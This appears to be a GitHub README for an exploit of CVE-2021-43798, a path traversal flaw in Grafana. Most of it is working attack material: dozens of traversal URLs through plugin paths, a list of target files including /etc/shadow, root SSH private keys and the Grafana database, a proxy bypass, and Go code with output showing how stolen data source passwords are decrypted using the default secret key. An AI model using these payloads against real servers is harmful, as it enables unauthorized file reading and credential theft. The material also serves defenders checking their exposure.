CVE-2021-43798 Grafana Unauthorized arbitrary file reading vulnerability

8.3.1 (2021-12-07) Security: Fixes CVE-2021-43798 . For more information, see our blog

https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/

Example: get db password

/var/lib/grafana/grafana.db

加盐密码明文验证 https://github.com/grafana/grafana/blob/985c61d7008211e0fbee7d095bf3424adf71b4ac/pkg/util/encoding.go

package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
	"golang.org/x/crypto/pbkdf2"
)

// EncodePassword encodes a password using PBKDF2.
func EncodePassword(password string, salt string) string {
	newPasswd := pbkdf2.Key([]byte(password), []byte(salt), 10000, 50, sha256.New)
	return hex.EncodeToString(newPasswd)
}

func main() {
	fmt.Println(EncodePassword("admin", "F3FAxVm33R"))
}

Config /etc/grafana/grafana.ini

bash-5.1$ ps -ef |grep grafana
    1 grafana   0:35 grafana-server --homepath=/usr/share/grafana --config=/etc/grafana/grafana.ini --packaging=docker cfg:default.log.mode=console cfg:default.paths.data=/var/lib/grafana cfg:default.paths.logs=/var/log/grafana cfg:default.paths.plugins=/var/lib/grafana/plugins cfg:default.paths.provisioning=/etc/grafana/provisioning

Ensure encryption of data source secrets

Data sources store passwords and basic auth passwords in secureJsonData encrypted (AES-256 in CFB mode) by default. Existing data source will keep working with unencrypted passwords. If you want to migrate to encrypted storage for your existing data sources you can do that by:

For data sources created through UI, you need to go to data source config, re-enter the password or basic auth password and save the data source.
For data sources created by provisioning, you need to update your config file and use secureJsonData.password or secureJsonData.basicAuthPassword field. See [provisioning docs]({{< relref "../administration/provisioning" >}}) for example of current configuration.

https://github.com/grafana/grafana/blob/main/pkg/util/encryption.go

decode password

例如：从数据库/var/lib/grafana/grafana.db获得数据源密文 R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q== ,通过读取 /etc/grafana/grafana.ini 中的 secret_key (default: SW2YcwTIb9zpOOhoPsMm),进行解密

$ go run AESDecrypt.go
[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
[*] DataSourcePassword= R3pMVVh1UHLoUkTJOl+Z/sFymLqolUOVtxCtQL/y+Q==
[*] plainText= jas502n

encode password

例如：将明文密码jas502n通过key，加密成密文

[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
[*] PlainText= jas502n
[*] EncodePassword= QWhMOFdNZkqW6bx9YM0dPHMjzInsvycQXgMmMfFqpA==

other attack

/conf/defaults.ini
/etc/grafana/grafana.ini
/etc/passwd
/etc/shadow
/home/grafana/.bash_history
/home/grafana/.ssh/id_rsa
/root/.bash_history
/root/.ssh/id_rsa
/usr/local/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/net/fib_trie
/proc/net/tcp
/proc/self/cmdline

Default plugins count: 40
Successful count: 48

Bypass grafana nginx Proxy error 400

https://twitter.com/chybeta/status/1468410745264041992

/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

0x0 Default plugins installed (40) list:

http://x.x.x.x:3000/api/plugins?embedded=0

alertlist
annolist
grafana-azure-monitor-datasource
barchart
bargauge
cloudwatch
dashlist
elasticsearch
gauge
geomap
gettingstarted
stackdriver
graph
graphite
heatmap
histogram
influxdb
jaeger
logs
loki
mssql
mysql
news
nodeGraph
opentsdb
piechart
pluginlist
postgres
prometheus
stat
state-timeline
status-history
table
table-old
tempo
testdata
text
timeseries
welcome
zipkin

0x01 /usr/share/grafana/public/app/plugins/datasource ( 21)

/usr/share/grafana/public/app/plugins/datasource

bash-5.1$ ls -l
drwxr-xr-x    3 root     root          4096 Oct  7 10:55 alertmanager
drwxr-xr-x    7 root     root          4096 Oct  7 10:55 cloud-monitoring
drwxr-xr-x    8 root     root          4096 Oct  7 10:55 cloudwatch
drwxr-xr-x    2 root     root          4096 Oct  7 10:55 dashboard
drwxr-xr-x    9 root     root          4096 Oct  7 10:55 elasticsearch
drwxr-xr-x    3 root     root          4096 Oct  7 10:55 grafana
drwxr-xr-x   19 root     root          4096 Oct  7 10:55 grafana-azure-monitor-datasource
drwxr-xr-x    9 root     root          4096 Oct  7 10:55 graphite
drwxr-xr-x    6 root     root          4096 Oct  7 10:55 influxdb
drwxr-xr-x    4 root     root          4096 Oct  7 10:55 jaeger
drwxr-xr-x    7 root     root          4096 Oct  7 10:55 loki
drwxr-xr-x    2 root     root          4096 Oct  7 10:55 mixed
drwxr-xr-x    5 root     root          4096 Oct  7 10:55 mssql
drwxr-xr-x    5 root     root          4096 Oct  7 10:55 mysql
drwxr-xr-x    6 root     root          4096 Oct  7 10:55 opentsdb
drwxr-xr-x    5 root     root          4096 Oct  7 10:55 postgres
drwxr-xr-x    7 root     root          4096 Oct  7 10:55 prometheus
drwxr-xr-x    4 root     root          4096 Oct  7 10:55 tempo
drwxr-xr-x    7 root     root          4096 Oct  7 10:55 testdata
drwxr-xr-x    4 root     root          4096 Oct  7 10:55 zipkin

Fuzz Successful!

/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

0x02 /usr/share/grafana/public/app/plugins/ (29)

/usr/share/grafana/public/app/plugins/panel/

drwxr-xr-x    2 root     root        4.0K Oct  7 10:55 alertGroups
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 alertlist
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 annolist
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 barchart
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 bargauge
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 canvas
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 dashlist
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 debug
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 gauge
drwxr-xr-x    8 root     root        4.0K Oct  7 10:55 geomap
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 gettingstarted
drwxr-xr-x    5 root     root        4.0K Oct  7 10:55 graph
drwxr-xr-x    5 root     root        4.0K Oct  7 10:55 heatmap
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 histogram
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 live
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 logs
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 news
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 nodeGraph
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 piechart
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 pluginlist
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 stat
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 state-timeline
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 status-history
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 table
drwxr-xr-x    4 root     root        4.0K Oct  7 10:55 table-old
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 text
drwxr-xr-x    6 root     root        4.0K Oct  7 10:55 timeseries
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 welcome
drwxr-xr-x    3 root     root        4.0K Oct  7 10:55 xychart

Fuzz Success

/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd

jas502n/Grafana-CVE-2021-43798

jas502n

Reviews

Repository Details